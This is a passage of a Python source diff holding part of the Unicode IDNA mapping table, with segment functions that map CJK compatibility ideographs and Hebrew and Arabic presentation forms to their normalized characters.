'良'), + (0xF97D, 'M', '諒'), + (0xF97E, 'M', '量'), + (0xF97F, 'M', '勵'), + (0xF980, 'M', '呂'), + (0xF981, 'M', '女'), + (0xF982, 'M', '廬'), + (0xF983, 'M', '旅'), + (0xF984, 'M', '濾'), + (0xF985, 'M', '礪'), + (0xF986, 'M', '閭'), + (0xF987, 'M', '驪'), + (0xF988, 'M', '麗'), + (0xF989, 'M', '黎'), + (0xF98A, 'M', '力'), + (0xF98B, 'M', '曆'), + (0xF98C, 'M', '歷'), + (0xF98D, 'M', '轢'), + (0xF98E, 'M', '年'), + (0xF98F, 'M', '憐'), + (0xF990, 'M', '戀'), + (0xF991, 'M', '撚'), + (0xF992, 'M', '漣'), + (0xF993, 'M', '煉'), + (0xF994, 'M', '璉'), + (0xF995, 'M', '秊'), + (0xF996, 'M', '練'), + (0xF997, 'M', '聯'), + (0xF998, 'M', '輦'), + (0xF999, 'M', '蓮'), + (0xF99A, 'M', '連'), + (0xF99B, 'M', '鍊'), + (0xF99C, 'M', '列'), + (0xF99D, 'M', '劣'), + (0xF99E, 'M', '咽'), + (0xF99F, 'M', '烈'), + (0xF9A0, 'M', '裂'), + (0xF9A1, 'M', '說'), + (0xF9A2, 'M', '廉'), + (0xF9A3, 'M', '念'), + (0xF9A4, 'M', '捻'), + (0xF9A5, 'M', '殮'), + (0xF9A6, 'M', '簾'), + (0xF9A7, 'M', '獵'), + (0xF9A8, 'M', '令'), + (0xF9A9, 'M', '囹'), + ] + +def _seg_41() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xF9AA, 'M', '寧'), + (0xF9AB, 'M', '嶺'), + (0xF9AC, 'M', '怜'), + (0xF9AD, 'M', '玲'), + (0xF9AE, 'M', '瑩'), + (0xF9AF, 'M', '羚'), + (0xF9B0, 'M', '聆'), + (0xF9B1, 'M', '鈴'), + (0xF9B2, 'M', '零'), + (0xF9B3, 'M', '靈'), + (0xF9B4, 'M', '領'), + (0xF9B5, 'M', '例'), + (0xF9B6, 'M', '禮'), + (0xF9B7, 'M', '醴'), + (0xF9B8, 'M', '隸'), + (0xF9B9, 'M', '惡'), + (0xF9BA, 'M', '了'), + (0xF9BB, 'M', '僚'), + (0xF9BC, 'M', '寮'), + (0xF9BD, 'M', '尿'), + (0xF9BE, 'M', '料'), + (0xF9BF, 'M', '樂'), + (0xF9C0, 'M', '燎'), + (0xF9C1, 'M', '療'), + (0xF9C2, 'M', '蓼'), + (0xF9C3, 'M', '遼'), + (0xF9C4, 'M', '龍'), + (0xF9C5, 'M', '暈'), + (0xF9C6, 'M', '阮'), + (0xF9C7, 'M', '劉'), + (0xF9C8, 'M', '杻'), + (0xF9C9, 'M', '柳'), + (0xF9CA, 'M', '流'), + (0xF9CB, 'M', '溜'), + (0xF9CC, 'M', '琉'), + (0xF9CD, 'M', '留'), + (0xF9CE, 'M', '硫'), + (0xF9CF, 'M', '紐'), + (0xF9D0, 'M', '類'), + (0xF9D1, 'M', '六'), + (0xF9D2, 'M', '戮'), + (0xF9D3, 'M', '陸'), + (0xF9D4, 'M', '倫'), + (0xF9D5, 'M', '崙'), + (0xF9D6, 'M', '淪'), + (0xF9D7, 'M', '輪'), + (0xF9D8, 'M', '律'), + (0xF9D9, 'M', '慄'), + (0xF9DA, 'M', '栗'), + (0xF9DB, 'M', '率'), + (0xF9DC, 'M', '隆'), + (0xF9DD, 'M', '利'), + (0xF9DE, 'M', '吏'), + (0xF9DF, 'M', '履'), + (0xF9E0, 'M', '易'), + (0xF9E1, 'M', '李'), + (0xF9E2, 'M', '梨'), + (0xF9E3, 'M', '泥'), + (0xF9E4, 'M', '理'), + (0xF9E5, 'M', '痢'), + (0xF9E6, 'M', '罹'), + (0xF9E7, 'M', '裏'), + (0xF9E8, 'M', '裡'), + (0xF9E9, 'M', '里'), + (0xF9EA, 'M', '離'), + (0xF9EB, 'M', '匿'), + (0xF9EC, 'M', '溺'), + (0xF9ED, 'M', '吝'), + (0xF9EE, 'M', '燐'), + (0xF9EF, 'M', '璘'), + (0xF9F0, 'M', '藺'), + (0xF9F1, 'M', '隣'), + (0xF9F2, 'M', '鱗'), + (0xF9F3, 'M', '麟'), + (0xF9F4, 'M', '林'), + (0xF9F5, 'M', '淋'), + (0xF9F6, 'M', '臨'), + (0xF9F7, 'M', '立'), + (0xF9F8, 'M', '笠'), + (0xF9F9, 'M', '粒'), + (0xF9FA, 'M', '狀'), + (0xF9FB, 'M', '炙'), + (0xF9FC, 'M', '識'), + (0xF9FD, 'M', '什'), + (0xF9FE, 'M', '茶'), + (0xF9FF, 'M', '刺'), + (0xFA00, 'M', '切'), + (0xFA01, 'M', '度'), + (0xFA02, 'M', '拓'), + (0xFA03, 'M', '糖'), + (0xFA04, 'M', '宅'), + (0xFA05, 'M', '洞'), + (0xFA06, 'M', '暴'), + (0xFA07, 'M', '輻'), + (0xFA08, 'M', '行'), + (0xFA09, 'M', '降'), + (0xFA0A, 'M', '見'), + (0xFA0B, 'M', '廓'), + (0xFA0C, 'M', '兀'), + (0xFA0D, 'M', '嗀'), + ] + +def _seg_42() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xFA0E, 'V'), + (0xFA10, 'M', '塚'), + (0xFA11, 'V'), + (0xFA12, 'M', '晴'), + (0xFA13, 'V'), + (0xFA15, 'M', '凞'), + (0xFA16, 'M', '猪'), + (0xFA17, 'M', '益'), + (0xFA18, 'M', '礼'), + (0xFA19, 'M', '神'), + (0xFA1A, 'M', '祥'), + (0xFA1B, 'M', '福'), + (0xFA1C, 'M', '靖'), + (0xFA1D, 'M', '精'), + (0xFA1E, 'M', '羽'), + (0xFA1F, 'V'), + (0xFA20, 'M', '蘒'), + (0xFA21, 'V'), + (0xFA22, 'M', '諸'), + (0xFA23, 'V'), + (0xFA25, 'M', '逸'), + (0xFA26, 'M', '都'), + (0xFA27, 'V'), + (0xFA2A, 'M', '飯'), + (0xFA2B, 'M', '飼'), + (0xFA2C, 'M', '館'), + (0xFA2D, 'M', '鶴'), + (0xFA2E, 'M', '郞'), + (0xFA2F, 'M', '隷'), + (0xFA30, 'M', '侮'), + (0xFA31, 'M', '僧'), + (0xFA32, 'M', '免'), + (0xFA33, 'M', '勉'), + (0xFA34, 'M', '勤'), + (0xFA35, 'M', '卑'), + (0xFA36, 'M', '喝'), + (0xFA37, 'M', '嘆'), + (0xFA38, 'M', '器'), + (0xFA39, 'M', '塀'), + (0xFA3A, 'M', '墨'), + (0xFA3B, 'M', '層'), + (0xFA3C, 'M', '屮'), + (0xFA3D, 'M', '悔'), + (0xFA3E, 'M', '慨'), + (0xFA3F, 'M', '憎'), + (0xFA40, 'M', '懲'), + (0xFA41, 'M', '敏'), + (0xFA42, 'M', '既'), + (0xFA43, 'M', '暑'), + (0xFA44, 'M', '梅'), + (0xFA45, 'M', '海'), + (0xFA46, 'M', '渚'), + (0xFA47, 'M', '漢'), + (0xFA48, 'M', '煮'), + (0xFA49, 'M', '爫'), + (0xFA4A, 'M', '琢'), + (0xFA4B, 'M', '碑'), + (0xFA4C, 'M', '社'), + (0xFA4D, 'M', '祉'), + (0xFA4E, 'M', '祈'), + (0xFA4F, 'M', '祐'), + (0xFA50, 'M', '祖'), + (0xFA51, 'M', '祝'), + (0xFA52, 'M', '禍'), + (0xFA53, 'M', '禎'), + (0xFA54, 'M', '穀'), + (0xFA55, 'M', '突'), + (0xFA56, 'M', '節'), + (0xFA57, 'M', '練'), + (0xFA58, 'M', '縉'), + (0xFA59, 'M', '繁'), + (0xFA5A, 'M', '署'), + (0xFA5B, 'M', '者'), + (0xFA5C, 'M', '臭'), + (0xFA5D, 'M', '艹'), + (0xFA5F, 'M', '著'), + (0xFA60, 'M', '褐'), + (0xFA61, 'M', '視'), + (0xFA62, 'M', '謁'), + (0xFA63, 'M', '謹'), + (0xFA64, 'M', '賓'), + (0xFA65, 'M', '贈'), + (0xFA66, 'M', '辶'), + (0xFA67, 'M', '逸'), + (0xFA68, 'M', '難'), + (0xFA69, 'M', '響'), + (0xFA6A, 'M', '頻'), + (0xFA6B, 'M', '恵'), + (0xFA6C, 'M', '𤋮'), + (0xFA6D, 'M', '舘'), + (0xFA6E, 'X'), + (0xFA70, 'M', '並'), + (0xFA71, 'M', '况'), + (0xFA72, 'M', '全'), + (0xFA73, 'M', '侀'), + (0xFA74, 'M', '充'), + (0xFA75, 'M', '冀'), + (0xFA76, 'M', '勇'), + (0xFA77, 'M', '勺'), + (0xFA78, 'M', '喝'), + ] + +def _seg_43() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xFA79, 'M', '啕'), + (0xFA7A, 'M', '喙'), + (0xFA7B, 'M', '嗢'), + (0xFA7C, 'M', '塚'), + (0xFA7D, 'M', '墳'), + (0xFA7E, 'M', '奄'), + (0xFA7F, 'M', '奔'), + (0xFA80, 'M', '婢'), + (0xFA81, 'M', '嬨'), + (0xFA82, 'M', '廒'), + (0xFA83, 'M', '廙'), + (0xFA84, 'M', '彩'), + (0xFA85, 'M', '徭'), + (0xFA86, 'M', '惘'), + (0xFA87, 'M', '慎'), + (0xFA88, 'M', '愈'), + (0xFA89, 'M', '憎'), + (0xFA8A, 'M', '慠'), + (0xFA8B, 'M', '懲'), + (0xFA8C, 'M', '戴'), + (0xFA8D, 'M', '揄'), + (0xFA8E, 'M', '搜'), + (0xFA8F, 'M', '摒'), + (0xFA90, 'M', '敖'), + (0xFA91, 'M', '晴'), + (0xFA92, 'M', '朗'), + (0xFA93, 'M', '望'), + (0xFA94, 'M', '杖'), + (0xFA95, 'M', '歹'), + (0xFA96, 'M', '殺'), + (0xFA97, 'M', '流'), + (0xFA98, 'M', '滛'), + (0xFA99, 'M', '滋'), + (0xFA9A, 'M', '漢'), + (0xFA9B, 'M', '瀞'), + (0xFA9C, 'M', '煮'), + (0xFA9D, 'M', '瞧'), + (0xFA9E, 'M', '爵'), + (0xFA9F, 'M', '犯'), + (0xFAA0, 'M', '猪'), + (0xFAA1, 'M', '瑱'), + (0xFAA2, 'M', '甆'), + (0xFAA3, 'M', '画'), + (0xFAA4, 'M', '瘝'), + (0xFAA5, 'M', '瘟'), + (0xFAA6, 'M', '益'), + (0xFAA7, 'M', '盛'), + (0xFAA8, 'M', '直'), + (0xFAA9, 'M', '睊'), + (0xFAAA, 'M', '着'), + (0xFAAB, 'M', '磌'), + (0xFAAC, 'M', '窱'), + (0xFAAD, 'M', '節'), + (0xFAAE, 'M', '类'), + (0xFAAF, 'M', '絛'), + (0xFAB0, 'M', '練'), + (0xFAB1, 'M', '缾'), + (0xFAB2, 'M', '者'), + (0xFAB3, 'M', '荒'), + (0xFAB4, 'M', '華'), + (0xFAB5, 'M', '蝹'), + (0xFAB6, 'M', '襁'), + (0xFAB7, 'M', '覆'), + (0xFAB8, 'M', '視'), + (0xFAB9, 'M', '調'), + (0xFABA, 'M', '諸'), + (0xFABB, 'M', '請'), + (0xFABC, 'M', '謁'), + (0xFABD, 'M', '諾'), + (0xFABE, 'M', '諭'), + (0xFABF, 'M', '謹'), + (0xFAC0, 'M', '變'), + (0xFAC1, 'M', '贈'), + (0xFAC2, 'M', '輸'), + (0xFAC3, 'M', '遲'), + (0xFAC4, 'M', '醙'), + (0xFAC5, 'M', '鉶'), + (0xFAC6, 'M', '陼'), + (0xFAC7, 'M', '難'), + (0xFAC8, 'M', '靖'), + (0xFAC9, 'M', '韛'), + (0xFACA, 'M', '響'), + (0xFACB, 'M', '頋'), + (0xFACC, 'M', '頻'), + (0xFACD, 'M', '鬒'), + (0xFACE, 'M', '龜'), + (0xFACF, 'M', '𢡊'), + (0xFAD0, 'M', '𢡄'), + (0xFAD1, 'M', '𣏕'), + (0xFAD2, 'M', '㮝'), + (0xFAD3, 'M', '䀘'), + (0xFAD4, 'M', '䀹'), + (0xFAD5, 'M', '𥉉'), + (0xFAD6, 'M', '𥳐'), + (0xFAD7, 'M', '𧻓'), + (0xFAD8, 'M', '齃'), + (0xFAD9, 'M', '龎'), + (0xFADA, 'X'), + (0xFB00, 'M', 'ff'), + (0xFB01, 'M', 'fi'), + ] + +def _seg_44() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xFB02, 'M', 'fl'), + (0xFB03, 'M', 'ffi'), + (0xFB04, 'M', 'ffl'), + (0xFB05, 'M', 'st'), + (0xFB07, 'X'), + (0xFB13, 'M', 'մն'), + (0xFB14, 'M', 'մե'), + (0xFB15, 'M', 'մի'), + (0xFB16, 'M', 'վն'), + (0xFB17, 'M', 'մխ'), + (0xFB18, 'X'), + (0xFB1D, 'M', 'יִ'), + (0xFB1E, 'V'), + (0xFB1F, 'M', 'ײַ'), + (0xFB20, 'M', 'ע'), + (0xFB21, 'M', 'א'), + (0xFB22, 'M', 'ד'), + (0xFB23, 'M', 'ה'), + (0xFB24, 'M', 'כ'), + (0xFB25, 'M', 'ל'), + (0xFB26, 'M', 'ם'), + (0xFB27, 'M', 'ר'), + (0xFB28, 'M', 'ת'), + (0xFB29, '3', '+'), + (0xFB2A, 'M', 'שׁ'), + (0xFB2B, 'M', 'שׂ'), + (0xFB2C, 'M', 'שּׁ'), + (0xFB2D, 'M', 'שּׂ'), + (0xFB2E, 'M', 'אַ'), + (0xFB2F, 'M', 'אָ'), + (0xFB30, 'M', 'אּ'), + (0xFB31, 'M', 'בּ'), + (0xFB32, 'M', 'גּ'), + (0xFB33, 'M', 'דּ'), + (0xFB34, 'M', 'הּ'), + (0xFB35, 'M', 'וּ'), + (0xFB36, 'M', 'זּ'), + (0xFB37, 'X'), + (0xFB38, 'M', 'טּ'), + (0xFB39, 'M', 'יּ'), + (0xFB3A, 'M', 'ךּ'), + (0xFB3B, 'M', 'כּ'), + (0xFB3C, 'M', 'לּ'), + (0xFB3D, 'X'), + (0xFB3E, 'M', 'מּ'), + (0xFB3F, 'X'), + (0xFB40, 'M', 'נּ'), + (0xFB41, 'M', 'סּ'), + (0xFB42, 'X'), + (0xFB43, 'M', 'ףּ'), + (0xFB44, 'M', 'פּ'), + (0xFB45, 'X'), + (0xFB46, 'M', 'צּ'), + (0xFB47, 'M', 'קּ'), + (0xFB48, 'M', 'רּ'), + (0xFB49, 'M', 'שּ'), + (0xFB4A, 'M', 'תּ'), + (0xFB4B, 'M', 'וֹ'), + (0xFB4C, 'M', 'בֿ'), + (0xFB4D, 'M', 'כֿ'), + (0xFB4E, 'M', 'פֿ'), + (0xFB4F, 'M', 'אל'), + (0xFB50, 'M', 'ٱ'), + (0xFB52, 'M', 'ٻ'), + (0xFB56, 'M', 'پ'), + (0xFB5A, 'M', 'ڀ'), + (0xFB5E, 'M', 'ٺ'), + (0xFB62, 'M', 'ٿ'), + (0xFB66, 'M', 'ٹ'), + (0xFB6A, 'M', 'ڤ'), + (0xFB6E, 'M', 'ڦ'), + (0xFB72, 'M', 'ڄ'), + (0xFB76, 'M', 'ڃ'), + (0xFB7A, 'M', 'چ'), + (0xFB7E, 'M', 'ڇ'), + (0xFB82, 'M', 'ڍ'), + (0xFB84, 'M', 'ڌ'), + (0xFB86, 'M', 'ڎ'), + (0xFB88, 'M', 'ڈ'), + (0xFB8A, 'M', 'ژ'), + (0xFB8C, 'M', 'ڑ'), + (0xFB8E, 'M', 'ک'), + (0xFB92, 'M', 'گ'), + (0xFB96, 'M', 'ڳ'), + (0xFB9A, 'M', 'ڱ'), + (0xFB9E, 'M', 'ں'), + (0xFBA0, 'M', 'ڻ'), + (0xFBA4, 'M', 'ۀ'), + (0xFBA6, 'M', 'ہ'), + (0xFBAA, 'M', 'ھ'), + (0xFBAE, 'M', 'ے'), + (0xFBB0, 'M', 'ۓ'), + (0xFBB2, 'V'), + (0xFBC3, 'X'), + (0xFBD3, 'M', 'ڭ'), + (0xFBD7, 'M', 'ۇ'), + (0xFBD9, 'M', 'ۆ'), + (0xFBDB, 'M', 'ۈ'), + (0xFBDD, 'M', 'ۇٴ'), + (0xFBDE, 'M', 'ۋ'), + ] + +def _seg_45() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xFBE0, 'M', 'ۅ'), + (0xFBE2, 'M', 'ۉ'), + (0xFBE4, 'M', 'ې'), + (0xFBE8, 'M', 'ى'), + (0xFBEA, 'M', 'ئا'), + (0xFBEC, 'M', 'ئە'), + (0xFBEE, 'M', 'ئو'), + (0xFBF0, 'M', 'ئۇ'), + (0xFBF2, 'M', 'ئۆ'), + (0xFBF4, 'M', 'ئۈ'), + (0xFBF6, 'M', 'ئې'), + (0xFBF9, 'M', 'ئى'), + (0xFBFC, 'M', 'ی'), + (0xFC00, 'M', 'ئج'), + (0xFC01, 'M', 'ئح'), + (0xFC02, 'M', 'ئم'), + (0xFC03, 'M', 'ئى'), + (0xFC04, 'M', 'ئي'), + (0xFC05, 'M', 'بج'), + (0xFC06, 'M', 'بح'), + (0xFC07, 'M', 'بخ'), + (0xFC08, 'M', 'بم'), + (0xFC09, 'M', 'بى'), + (0xFC0A, 'M', 'بي'), + (0xFC0B, 'M', 'تج'), + (0xFC0C, 'M', 'تح'), + (0xFC0D, 'M', 'تخ'), + (0xFC0E, 'M', 'تم'), + (0xFC0F, 'M', 'تى'), + (0xFC10, 'M', 'تي'), + (0xFC11, 'M', 'ثج'), + (0xFC12, 'M', 'ثم'), + (0xFC13, 'M', 'ثى'), + (0xFC14, 'M', 'ثي'), + (0xFC15, 'M', 'جح'), + (0xFC16, 'M', 'جم'), + (0xFC17, 'M', 'حج'), + (0xFC18, 'M', 'حم'), + (0xFC19, 'M', 'خج'), + (0xFC1A, 'M', 'خح'), + (0xFC1B, 'M', 'خم'), + (0xFC1C, 'M', 'سج'), + (0xFC1D, 'M', 'سح'), + (0xFC1E, 'M', 'سخ'), + (0xFC1F, 'M', 'سم'), + (0xFC20, 'M', 'صح'), + (0xFC21, 'M', 'صم'), + (0xFC22, 'M', 'ضج'), + (0xFC23, 'M', 'ضح'), + (0xFC24, 'M', 'ضخ'), + (0xFC25, 'M', 'ضم'), + (0xFC26, 'M', 'طح'), + (0xFC27, 'M', 'طم'), + (0xFC28, 'M', 'ظم'), + (0xFC29, 'M', 'عج'), + (0xFC2A, 'M', 'عم'), + (0xFC2B, 'M', 'غج'), + (0xFC2C, 'M', 'غم'), + (0xFC2D, 'M', 'فج'), + (0xFC2E, 'M', 'فح'), + (0xFC2F, 'M', 'فخ'), + (0xFC30, 'M', 'فم'), + (0xFC31, 'M', 'فى'), + (0xFC32, 'M', 'في'), + (0xFC33, 'M', 'قح'), + (0xFC34, 'M', 'قم'), + (0xFC35, 'M', 'قى'), + (0xFC36, 'M', 'قي'), + (0xFC37, 'M', 'كا'), + (0xFC38, 'M', 'كج'), + (0xFC39, 'M', 'كح'), + (0xFC3A, 'M', 'كخ'), + (0xFC3B, 'M', 'كل'), + (0xFC3C, 'M', 'كم'), + (0xFC3D, 'M', 'كى'), + (0xFC3E, 'M', 'كي'), + (0xFC3F, 'M', 'لج'), + (0xFC40, 'M', 'لح'), + (0xFC41, 'M', 'لخ'), + (0xFC42, 'M', 'لم'), + (0xFC43, 'M', 'لى'), + (0xFC44, 'M', 'لي'), + (0xFC45, 'M', 'مج'), + (0xFC46, 'M', 'مح'), + (0xFC47, 'M', 'مخ'), + (0xFC48, 'M', 'مم'), + (0xFC49, 'M', 'مى'), + (0xFC4A, 'M', 'مي'), + (0xFC4B, 'M', 'نج'), + (0xFC4C, 'M', 'نح'), + (0xFC4D, 'M', 'نخ'), + (0xFC4E, 'M', 'نم'), + (0xFC4F, 'M', 'نى'), + (0xFC50, 'M', 'ني'), + (0xFC51, 'M', 'هج'), + (0xFC52, 'M', 'هم'), + (0xFC53, 'M', 'هى'), + (0xFC54, 'M', 'هي'), + (0xFC55, 'M', 'يج'), + (0xFC56, 'M', 'يح'), + ] + +def _seg_46() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xFC57, 'M', 'يخ'), + (0xFC58, 'M', 'يم'), + (0xFC59, 'M', 'يى'), + (0xFC5A, 'M', 'يي'), + (0xFC5B, 'M', 'ذٰ'), + (0xFC5C, 'M', 'رٰ'), + (0xFC5D, 'M', 'ىٰ'), + (0xFC5E, '3', ' ٌّ'), + (0xFC5F, '3', ' ٍّ'), + (0xFC60, '3', ' َّ'), + (0xFC61, '3', ' ُّ'), + (0xFC62, '3', ' ِّ'), + (0xFC63, '3', ' ّٰ'), + (0xFC64, 'M', 'ئر'), + (0xFC65, 'M', 'ئز'), + (0xFC66, 'M', 'ئم'), + (0xFC67, 'M', 'ئن'), + (0xFC68, 'M', 'ئى'), + (0xFC69, 'M', 'ئي'), + (0xFC6A, 'M', 'بر'), + (0xFC6B, 'M', 'بز'), + (0xFC6C, 'M', 'بم'), + (0xFC6D, 'M', 'بن'), + (0xFC6E, 'M', 'بى'), + (0xFC6F, 'M', 'بي'), + (0xFC70, 'M', 'تر'), + (0xFC71, 'M', 'تز'), + (0xFC72, 'M', 'تم'), + (0xFC73, 'M', 'تن'), + (0xFC74, 'M', 'تى'), + (0xFC75, 'M', 'تي'), + (0xFC76, 'M', 'ثر'), + (0xFC77, 'M', 'ثز'), + (0xFC78, 'M', 'ثم'), + (0xFC79, 'M', 'ثن'), + (0xFC7A, 'M', 'ثى'), + (0xFC7B, 'M', 'ثي'), + (0xFC7C, 'M', 'فى'), + (0xFC7D, 'M', 'في'), + (0xFC7E, 'M', 'قى'), + (0xFC7F, 'M', 'قي'), + (0xFC80, 'M', 'كا'), + (0xFC81, 'M', 'كل'), + (0xFC82, 'M', 'كم'), + (0xFC83, 'M', 'كى'), + (0xFC84, 'M', 'كي'), + (0xFC85, 'M', 'لم'), + (0xFC86, 'M', 'لى'), + (0xFC87, 'M', 'لي'), + (0xFC88, 'M', 'ما'), + (0xFC89, 'M', 'مم'), + (0xFC8A, 'M', 'نر'), + (0xFC8B, 'M', 'نز'), + (0xFC8C, 'M', 'نم'), + (0xFC8D, 'M', 'نن'), + (0xFC8E, 'M', 'نى'), + (0xFC8F, 'M', 'ني'), + (0xFC90, 'M', 'ىٰ'), + (0xFC91, 'M', 'ير'), + (0xFC92, 'M', 'يز'), + (0xFC93, 'M', 'يم'), + (0xFC94, 'M', 'ين'), + (0xFC95, 'M', 'يى'), + (0xFC96, 'M', 'يي'), + (0xFC97, 'M', 'ئج'), + (0xFC98, 'M', 'ئح'), + (0xFC99, 'M', 'ئخ'), + (0xFC9A, 'M', 'ئم'), + (0xFC9B, 'M', 'ئه'), + (0xFC9C, 'M', 'بج'), + (0xFC9D, 'M', 'بح'), + (0xFC9E, 'M', 'بخ'), + (0xFC9F, 'M', 'بم'), + (0xFCA0, 'M', 'به'), + (0xFCA1, 'M', 'تج'), + (0xFCA2, 'M', 'تح'), + (0xFCA3, 'M', 'تخ'), + (0xFCA4, 'M', 'تم'), + (0xFCA5, 'M', 'ته'), + (0xFCA6, 'M', 'ثم'), + (0xFCA7, 'M', 'جح'), + (0xFCA8, 'M', 'جم'), + (0xFCA9, 'M', 'حج'), + (0xFCAA, 'M', 'حم'), + (0xFCAB, 'M', 'خج'), + (0xFCAC, 'M', 'خم'), + (0xFCAD, 'M', 'سج'), + (0xFCAE, 'M', 'سح'), + (0xFCAF, 'M', 'سخ'), + (0xFCB0, 'M', 'سم'), + (0xFCB1, 'M', 'صح'), + (0xFCB2, 'M', 'صخ'), + (0xFCB3, 'M', 'صم'), + (0xFCB4, 'M', 'ضج'), + (0xFCB5, 'M', 'ضح'), + (0xFCB6, 'M', 'ضخ'), + (0xFCB7, 'M', 'ضم'), + (0xFCB8, 'M', 'طح'), + (0xFCB9, 'M', 'ظم'), + (0xFCBA, 'M', 'عج'), + ] + +def _seg_47() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xFCBB, 'M', 'عم'), + (0xFCBC, 'M', 'غج'), + (0xFCBD, 'M', 'غم'), + (0xFCBE, 'M', 'فج'), + (0xFCBF, 'M', 'فح'), + (0xFCC0, 'M', 'فخ'), + (0xFCC1, 'M', 'فم'), + (0xFCC2, 'M', 'قح'), + (0xFCC3, 'M', 'قم'), + (0xFCC4, 'M', 'كج'), + (0xFCC5, 'M', 'كح'), + (0xFCC6, 'M', 'كخ'), + (0xFCC7, 'M', 'كل'), + (0xFCC8, 'M', 'كم'), + (0xFCC9, 'M', 'لج'), + (0xFCCA, 'M', 'لح'), + (0xFCCB, 'M', 'لخ'), + (0xFCCC, 'M', 'لم'), + (0xFCCD, 'M', 'له'), + (0xFCCE, 'M', 'مج'), + (0xFCCF, 'M', 'مح'), + (0xFCD0, 'M', 'مخ'), + (0xFCD1, 'M', 'مم'), + (0xFCD2, 'M', 'نج'), + (0xFCD3, 'M', 'نح'), + (0xFCD4, 'M', 'نخ'), + (0xFCD5, 'M', 'نم'), + (0xFCD6, 'M', 'نه'), + (0xFCD7, 'M', 'هج'), + (0xFCD8, 'M', 'هم'), + (0xFCD9, 'M', 'هٰ'), + (0xFCDA, 'M', 'يج'), + (0xFCDB, 'M', 'يح'), + (0xFCDC, 'M', 'يخ'), + (0xFCDD, 'M', 'يم'), + (0xFCDE, 'M', 'يه'), + (0xFCDF, 'M', 'ئم'), + (0xFCE0, 'M', 'ئه'), + (0xFCE1, 'M', 'بم'), + (0xFCE2, 'M', 'به'), + (0xFCE3, 'M', 'تم'), + (0xFCE4, 'M', 'ته'), + (0xFCE5, 'M', 'ثم'), + (0xFCE6, 'M', 'ثه'), + (0xFCE7, 'M', 'سم'), + (0xFCE8, 'M', 'سه'), + (0xFCE9, 'M', 'شم'), + (0xFCEA, 'M', 'شه'), + (0xFCEB, 'M', 'كل'), + (0xFCEC, 'M', 'كم'), + (0xFCED, 'M', 'لم'), + (0xFCEE, 'M', 'نم'), + (0xFCEF, 'M', 'نه'), + (0xFCF0, 'M', 'يم'), + (0xFCF1, 'M', 'يه'), + (0xFCF2, 'M', 'ـَّ'), + (0xFCF3, 'M', 'ـُّ'), + (0xFCF4, 'M', 'ـِّ'), + (0xFCF5, 'M', 'طى'), + (0xFCF6, 'M', 'طي'), + (0xFCF7, 'M', 'عى'), + (0xFCF8, 'M', 'عي'), + (0xFCF9, 'M', 'غى'), + (0xFCFA, 'M', 'غي'), + (0xFCFB, 'M', 'سى'), + (0xFCFC, 'M', 'سي'), + (0xFCFD, 'M', 'شى'), + (0xFCFE, 'M', 'شي'), + (0xFCFF, 'M', 'حى'), + (0xFD00, 'M', 'حي'), + (0xFD01, 'M', 'جى'), + (0xFD02, 'M', 'جي'), + (0xFD03, 'M', 'خى'), + (0xFD04, 'M', 'خي'), + (0xFD05, 'M', 'صى'), + (0xFD06, 'M', 'صي'), + (0xFD07, 'M', 'ضى'), + (0xFD08, 'M', 'ضي'), + (0xFD09, 'M', 'شج'), + (0xFD0A, 'M', 'شح'), + (0xFD0B, 'M', 'شخ'), + (0xFD0C, 'M', 'شم'), + (0xFD0D, 'M', 'شر'), + (0xFD0E, 'M', 'سر'), + (0xFD0F, 'M', 'صر'), + (0xFD10, 'M', 'ضر'), + (0xFD11, 'M', 'طى'), + (0xFD12, 'M', 'طي'), + (0xFD13, 'M', 'عى'), + (0xFD14, 'M', 'عي'), + (0xFD15, 'M', 'غى'), + (0xFD16, 'M', 'غي'), + (0xFD17, 'M', 'سى'), + (0xFD18, 'M', 'سي'), + (0xFD19, 'M', 'شى'), + (0xFD1A, 'M', 'شي'), + (0xFD1B, 'M', 'حى'), + (0xFD1C, 'M', 'حي'), + (0xFD1D, 'M', 'جى'), + (0xFD1E, 'M', 'جي'), + ] + +def _seg_48() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xFD1F, 'M', 'خى'), + (0xFD20, 'M', 'خي'), + (0xFD21, 'M', 'صى'), + (0xFD22, 'M', 'صي'), + (0xFD23, 'M', 'ضى'), + (0xFD24, 'M', 'ضي'), + (0xFD25, 'M', 'شج'), + (0xFD26, 'M', 'شح'), + (0xFD27, 'M', 'شخ'), + (0xFD28, 'M', 'شم'), + (0xFD29, 'M', 'شر'), + (0xFD2A, 'M', 'سر'), + (0xFD2B, 'M', 'صر'), + (0xFD2C, 'M', 'ضر'), + (0xFD2D, 'M', 'شج'), + (0xFD2E, 'M', 'شح'), + (0xFD2F, 'M', 'شخ'), + (0xFD30, 'M', 'شم'), + (0xFD31, 'M', 'سه'), + (0xFD32, 'M', 'شه'), + (0xFD33, 'M', 'طم'), + (0xFD34, 'M', 'سج'), + (0xFD35, 'M', 'سح'), + (0xFD36, 'M', 'سخ'), + (0xFD37, 'M', 'شج'), + (0xFD38, 'M', 'شح'), + (0xFD39, 'M', 'شخ'), + (0xFD3A, 'M', 'طم'), + (0xFD3B, 'M', 'ظم'), + (0xFD3C, 'M', 'اً'), + (0xFD3E, 'V'), + (0xFD50, 'M', 'تجم'), + (0xFD51, 'M', 'تحج'), + (0xFD53, 'M', 'تحم'), + (0xFD54, 'M', 'تخم'), + (0xFD55, 'M', 'تمج'), + (0xFD56, 'M', 'تمح'), + (0xFD57, 'M', 'تمخ'), + (0xFD58, 'M', 'جمح'), + (0xFD5A, 'M', 'حمي'), + (0xFD5B, 'M', 'حمى'), + (0xFD5C, 'M', 'سحج'), + (0xFD5D, 'M', 'سجح'), + (0xFD5E, 'M', 'سجى'), + (0xFD5F, 'M', 'سمح'), + (0xFD61, 'M', 'سمج'), + (0xFD62, 'M', 'سمم'), + (0xFD64, 'M', 'صحح'), + (0xFD66, 'M', 'صمم'), + (0xFD67, 'M', 'شحم'), + (0xFD69, 'M', 'شجي'), + (0xFD6A, 'M', 'شمخ'), + (0xFD6C, 'M', 'شمم'), + (0xFD6E, 'M', 'ضحى'), + (0xFD6F, 'M', 'ضخم'), + (0xFD71, 'M', 'طمح'), + (0xFD73, 